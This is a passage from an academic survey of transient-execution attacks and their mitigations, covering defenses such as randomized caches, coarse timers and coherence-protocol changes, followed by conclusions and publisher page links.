Randomized Caches. In contrast to partitioned caches, instead of splitting the cache and controlling performance, randomized caches leverage the observation that all communication channels can be reduced to eviction-based channels. Replacement-Policy-Based channels, similarly to eviction-based channels, requires finding multiple addresses that occupy the same set. Coherence-Based channels require shared memory to not be deduplicated in the cache hierarchy. Therefore, replacement-policy-based channels can be considered a subset of eviction-based channels while coherence-based channels can be reduced to eviction-based channels by duplicating memory in the cache hierarchy. The latter reduction has a side-effect wherein cacheable shared memory cannot be writable as that would require stores to shared memory to modify multiple cache lines in the hierarchy. By reducing all communication channels to the same type, randomized caches look to make the problem of “finding a group of addresses which occupy the same set” hard. This is achieved by using different hash functions per way. The traditional set-associative cache is split into w direct-mapped caches ($\text{ways} = 1$), wherein each direct-mapped cache will use a different hash function. The set is the group of all cache lines returned from each direct-mapped cache. There are proposals which use cryptographic hashes [131, 137, 169], while others will change the hash dynamically [121, 122] or use a single-layer of pointer redirection [89]. Other works, do not rely on these techniques and seek to define security by intrinsically tying multiple states and allowing displacements within the cache [41]. Similarly to cache partitioning, if the attacker does not use a communication-channel in the cache hierarchy then defenses provided by Randomized Caches are ineffective.

Low Resolution Timers. The communication channels described in Section 4 rely on measuring the latency of memory operations to infer what data was transmitted. A possible defense is to decrease the granularity of the timer read by the attacker, such that no difference can be detected between an access serviced by the cache hierarchy and the external memory, or between two different events in the cache hierarchy. Certain execution environments, e.g., browsers, forbid software from accessing the high-performance counters and the timers available in the systems [103, 144, 149, 152]. However, it has been shown that high-resolution timers can be built using other methods [104, 136, 170, 173, 186]. Generally, these timers are constructed by executing a constant-time code and inferring a timer from that executing time. Another option is to amplify the latency of transient instructions, e.g., rely on multiple high-latency micro-architectural events such that the low-resolution timer cannot hide the sequence of events being measured.

Coherence Protocol. The cache hierarchy is manipulated by memory accesses performed by all cores in the system, regardless of speculation or not. The coherence protocol is tasked with maintaining a shared global state between all caches in a system. Any memory access creates coherence traffic in the network. Therefore, even if the cache hierarchy could be efficiently cleared on a mis-speculation, the attacker could still build a communication channel through the latency of the coherence network. Instead of defending particular cache levels, coherence protocol defenses aims to defend the whole cache hierarchy by controlling which cache lines are available in the hierarchy. Similarly to the trap speculation technique in Section 6.1, the coherence protocol reverses the effects of speculation when a misprediction occurs [172].

Discussion. A significant advantage of using limited-communication-channel defenses is that the performance penalty should be lower while the core remains unchanged. The cited works herein show a maximum performance penalty of 13% [184] for limited-communication-channel defenses whereas the limited-speculation defenses show a 125% [167] maximum performance penalty. Focusing on communication channels defenses has three advantages: the ISA does not need to define the global micro-architectural/speculative state; only a small portion of the micro-architectural states lead to a communication channel; and blocking data transfers in the communication channel can be designed and employed independently of the micro-architectural state, which connects to the communication channel. If any TEA requires a communication channel, then a limited-communication-channel defense provides a clear separation of complexities between the speculative state and security. Since limited-communication-channel defenses focus on the cache hierarchy, which has no defined architectural state, most defenses should maintain SW BC. The same is not true for limited-speculation defenses. However, HW BC is not maintained due to the required changes to the cache hierarchy. No member of the industry has yet deployed any defense of this type. One may think that Intel’s Cache Allocation Technology (CAT) could be considered a currently employed defense. However, CAT is insecure because it still allows page sharing between victim and attacker which permits setting up FLUSH+RELOAD [179] or FLUSH+FLUSH [46] communication channels [79]. The reluctance of deploying limited-communication-channel defenses may come from the complexity of the cache hierarchy and that other communication channels may be used [18, 28, 116, 124].

Summary. If the goal of providing performance year-on-year is maintained, the only current solution that is closest to that goal is to use communication-channel-limited defenses. There is significant interest by the community in designing secure caches not only to be used to deter TEAs but also to improve the security of trusted execution environments [29]. Communication channels need to keep being cataloged. This process involves understanding how the communication channel is built, how data is transferred, and how the channel construction and/or transfer can be blocked.

7 Conclusions

TEAs introduce a paradigm shift in computer architectures. No longer are architectures designed with performance and power solely in mind but also with security. Many techniques and components which would provide better performance are susceptible to TEAs. The current toolchains, development flow, and techniques used to implement and design micro-architectures need to be updated to take into account these new threats. Moreover, new metrics related with security need to be defined. Current computer architectures are optimized for performance/watt. However, TEAs demonstrate that new metrics, which relate security to performance, are required. Furthermore, there are unexplored TEAs in hint instructions and within the memory consistency model.

This survey gives an overview of the components involved in the design of micro-architectures which are susceptible to TEAs. This attack type involves implicitly programming a state that is not defined in the ISA. Transient execution is the glue that permits these attacks to occur, which leads to security flaws. We hope that the detailed explanation of the original Meltdown-US and Spectre-PHT/BTB attacks, as well as of recent advances in attacks and defenses against TEAs, inspires and contribute to the design of more secure processors and systems.

Acknowledgments

The authors would also like to thank Paulo Martins, Diogo Marques, and João Vieira for providing suggestions to improve this survey.

References

[1]

Onur Acıiçmez and Werner Schindler. 2008. A vulnerability in RSA implementations due to instruction cache analysis and its demonstration on OpenSSL. In Topics in Cryptology—CT-RSA 2008, Tal Malkin (Ed.), Springer, Berlin, 256–273.

Abstract

1 Introduction

2 Background: Modern Computer Architectures

2.1 Core Execution Architecture

2.2 Cache Hierarchy

2.3 Memory Consistency

2.4 Cache Coherence

2.5 Virtual Memory and Process Isolation

3 Speculation

3.1 Instruction Stream

3.2 Memory Dependence

3.3 Exceptions

3.4 Side-Effects

4 Retrieving DATA from Speculation Side-Effects in the Cache Hierarchy

4.1 Eviction-Based Channels

4.2 Replacement-Policy-Based Channels

4.3 Coherence-Based Channels

5 Mounting Transient-Execution Attacks

5.1 Original Spectre-PHT/-BTB and Meltdown-US Attacks

5.2 Advances in Spectre- and Meltdown-Type Attacks

6 State-of-the-Art Defenses

6.1 Limited-Speculation Defenses

6.2 Limited-Communication-Channel Defenses

7 Conclusions

Acknowledgments

References

Index Terms

Recommendations

Survey of Transient Execution Attacks and Their Mitigations

Evolution of Defenses against Transient-Execution Attacks

Micro-architectural Cache Side-Channel Attacks and Countermeasures

Comments

Information

Published In

Publisher

Publication History

Permissions

Check for updates

Author Tags

Qualifiers

Funding Sources

Contributors

Other Metrics

Bibliometrics

Article Metrics

Other Metrics

Citations

View options

PDF

eReader

Get Access

Login options

Full Access

Figures

Other

Share

Share this Publication link

Share on social media

Affiliations